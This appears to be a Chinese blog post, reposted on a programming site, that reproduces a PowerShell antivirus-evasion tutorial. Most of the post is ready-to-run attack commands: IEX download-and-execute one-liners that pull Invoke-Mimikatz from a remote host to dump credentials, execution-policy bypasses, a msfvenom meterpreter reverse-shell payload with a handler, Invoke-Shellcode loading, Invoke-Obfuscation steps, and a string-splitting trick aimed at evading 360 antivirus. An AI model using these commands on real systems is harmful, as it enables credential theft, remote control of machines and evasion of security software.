2. 程式人生 > 其它 >powershell實現免殺(復現)

powershell實現免殺(復現)

阿新 發佈:2022-03-20

powershell實現免殺(復現)

目錄

本篇為遠控免殺從入門到實踐(6)-程式碼篇-Powershell復現篇

基礎知識

UNIX系統一直有著功能強大的殼程式(shell),Windows PowerShell的誕生就是要提供功能相當於UNIX系統的命令列殼程式(例如:sh、bash或csh),同時也內建指令碼語言以及輔助指令碼程式的工具,使命令列使用者和指令碼編寫者可以利用 .NET Framework的強大功能。

powershell具有在硬碟中易繞過,記憶體中難查殺的特點。一般在後滲透中,攻擊者可以在計算機上執行程式碼時,會下載powershell指令碼來執行,ps1指令碼檔案無需寫入到硬碟中,直接可以在記憶體中執行。

版本目錄

powershell只能針對win7之後的系統,之前的win作業系統預設沒有安裝powershell。不同架構的payload(x86或x64)需要不同版本的powershell來載入,否則會出錯。

64位所在目錄:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

32位所在目錄:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

執行方式

  1. 網路環境直接執行程式碼

無檔案寫入,相對較為隱蔽。下面程式碼為載入遠端指令碼Invoke-Mimikatz.ps1,執行Mimikatz的DumpCreds功能。

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.211.55.2/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
  1. 本地執行

先把http://10.211.55.2/Invoke-Mimikatz.ps1下載到本地

然後匯入powershell Import-Module .\Invoke-Mimikatz.ps1

使用命令Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'

或者Invoke-Mimikatz -DumpCreds

執行策略

檢視執行策略powershell Get-ExecutionPolicy

Unrestricted 許可權最高,可以不受限制執行任意指令碼

Restricted 預設策略,不允許任意指令碼的執行

AllSigned 所有指令碼必須經過簽名執行

RemoteSigned 本地指令碼無限制,但是對來自網路的指令碼必須經過簽名

Bypass 沒有任何限制和提示

Undefined 沒有設定指令碼的策略

繞過執行策略執行大概有以下幾種:

1.本地讀取然後通過管道符執行

powershell Get-Content 1.ps1 | powershell -NoProfile -

2.遠端下載並通過IEX執行指令碼

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.129/ps/a.ps1')"

3.Bypass執行策略繞過

powershell -ExecutionPolicy bypass -File ./a.ps1

不會顯示警告和提示

4.Unrestricted執行策略標誌

powershell -ExecutionPolicy unrestricted -File ./a.ps1

當執行一個從網上下載的未簽名的指令碼時,會給出許可權提示

需要解釋的是:

Invoke-Expression(IEX的別名):用來把字串當作命令執行。
WindowStyle Hidden(-w Hidden):隱藏視窗
Nonlnteractive(-NonI):非互動模式,PowerShell不為使用者提供互動的提示。
NoProfile(-NoP):PowerShell控制檯不載入當前使用者的配置檔案。
Noexit(-Noe):執行後不退出Shell。
EncodedCommand(-enc): 接受base64 encode的字串編碼,避免一些解析問題

powershell載入shellcode

msf-ps1本地執行

加入shikata_ga_nai編碼的ps1指令碼生成payload:

msfvenom -p  windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 20 -b '\x00' lhost=192.168.211.147 lport=3333 -f psh -o shell3.ps1

將shell.ps1拷貝到目標機上,執行

powershell.exe -ExecutionPolicy Bypass -NoExit -File  shell.ps1

msf:

use exploit/multi/handler
set payload /windows/x64/meterpreter/reverse_https
set LHOST ip
set LPORT 
run

實際效果不佳,還是會報警

增加編碼次數還是會報警

Invoke-Shellcode載入

IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")

IEX(New-Object Net.WebClient).DownloadString("http://192.168.211.147:1337/shell3.ps1")

Invoke-Shellcode -Shellcode ($buf) -Force

實際中用powershell執行遠端下載或執行shellcode時,容易觸發殺軟行為規則

Invoke-Obfuscation

Invoke-Obfuscation

載入Invoke-Obfuscation:

在powershell中執行Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation

選擇免殺檔案:

set scriptpath

選擇編碼方式:

encoding

輸出免殺檔案:

免殺成功

msf成功上線

ps1行為免殺

對於IEX這種方便快捷的方式直接執行會被360攔截。可嘗試從語法上簡單變化。主要是對DownloadString、http做一些處理。

比如利用replace替換函式,可以bypass。

powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://10.211.55.2/shell.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

此payload已經被殺,需要根據實際進行更改

總結

復現Tide安全團隊的免殺篇,目前基於靜態特徵免殺和一部分行為免殺,其他免殺方式將在後續陸續學習

相關推薦

powershell實現復現

powershell實現復現 目錄 基礎知識 版本目錄 執行方式 執行策略 powershell載入shellcode

python實現的分離包含pyinstaller的安裝與使用

題記 今天本來打算學python的,突然看到萌萌噠的小玉玉發了個免殺的工具,迫不及待的來試試了。此貼記錄我實際操作的整個過程,在此膜拜大神,大神上次還分享了個0day雖然爛大街了,但是對於我這個菜鳥來說,還是

oj程式碼runtime error_基於 Redis 分散式鎖實現“秒含程式碼

技術標籤:oj程式碼runtime error 業務場景一些可能的實現何為分散式鎖具體的實現需要考慮的問題talk is cheap,show me the code小結

Github使用SSH來實現登入windows版

Github使用SSH來實現登入windows版 1 前言介紹 Github官方clone程式碼的方式有三種:

手把手教你用 Node 實現 HTTP 協議

手把手教你用 Node 實現 HTTP 協議 上一章介紹瞭如何解析 HTTP 請求報文,這一章我們來講解如何進行報文的收發和 TCP 連線的建立。

Android實現藍芽BlueTooth裝置檢測連線

無論是WIFI還是4G網路,建立網路連線後都是訪問網際網路資源,並不能直接訪問區域網資源。比如兩個人在一起,A要把手機上的視訊傳給B,通常情況是開啟手機QQ,通過QQ傳送檔案給對方。不過上傳視訊很耗流量,如果現場

unity實現滑鼠跟隨ITween

本文例項為大家分享了unity實現滑鼠跟隨的具體程式碼,供大家參考,具體內容如下

C++實現歸併排序MergeSort

本文例項為大家分享了C++實現歸併排序的具體程式碼,供大家參考,具體內容如下

C++實現氣泡排序BubbleSort

本文例項為大家分享了C++實現氣泡排序的具體程式碼,供大家參考,具體內容如下

C++實現選擇排序selectionSort

本文例項為大家分享了Android九宮格圖片展示的具體程式碼,供大家參考,具體內容如下

C++實現選擇性排序SelectionSort

“選擇性排序”是數列排序的演算法之一。 其思路引點來源於經典的“可樂雪碧問題”

Unity實現俄羅斯方塊

本文例項為大家分享了Unity實現俄羅斯方塊第一部分,供大家參考,具體內容如下

Unity實現俄羅斯方塊

本文例項為大家分享了Unity實現俄羅斯方塊第2部分,供大家參考,具體內容如下

Unity實現俄羅斯方塊

本文例項為大家分享了Unity實現俄羅斯方塊第3部分,供大家參考,具體內容如下

gitlab-ci部署實現持續整合centos7

一、gitlab安裝 1. 環境準備 // selinux和 firewall 關閉 $ setenforce 0 $ sed -i \"/^SELINUX/s/enforcing/disabled/\" /etc/selinux/config

.NET Core微服務之基於Consul實現服務治理轉載

一、Consul基礎介紹   Consul是HashiCorp公司推出的開源工具,用於實現分散式系統的服務發現與配置。與其他分散式服務註冊與發現的方案,比如Airbnb的SmartStack等相比,Consul的方案更“一站式&rdquo

小話資料結構-圖 (聚焦與於實現的理解)轉載

前言 本文程式碼基於C++實現,閱讀本文,需要有以下知識 教熟練使用C++ STL庫中的vector,map,pair等;

基於 Aspect-Injector 以及 .NET CORE 3.1 實現AOP程式設計

之前學習.NET CORE 接觸到切面程式設計這個概念,比較感興趣,怎奈工作太忙,沒時間研究,這周難得空閒一天,就試了下,在這裡分享下。

用C++實現的有理數分數四則混合運算計算器

實現目標 用C++實現下圖所示的一個console程式: 其中: 1、加減乘除四種運算子號分別用+、-、*、/表示, + 和 - 還分別用於表示正號和負號。

Android實現進度條ProgressBar的功能與用法

進度條ProgressBar的功能與用法,供大家參考,具體內容如下 進度條是UI介面中一種實用的UI元件,用於顯示一個耗時操作顯示出來的百分比,進度條可以動態的顯示進度,避免是使用者覺得系統長時間未反應,提高使用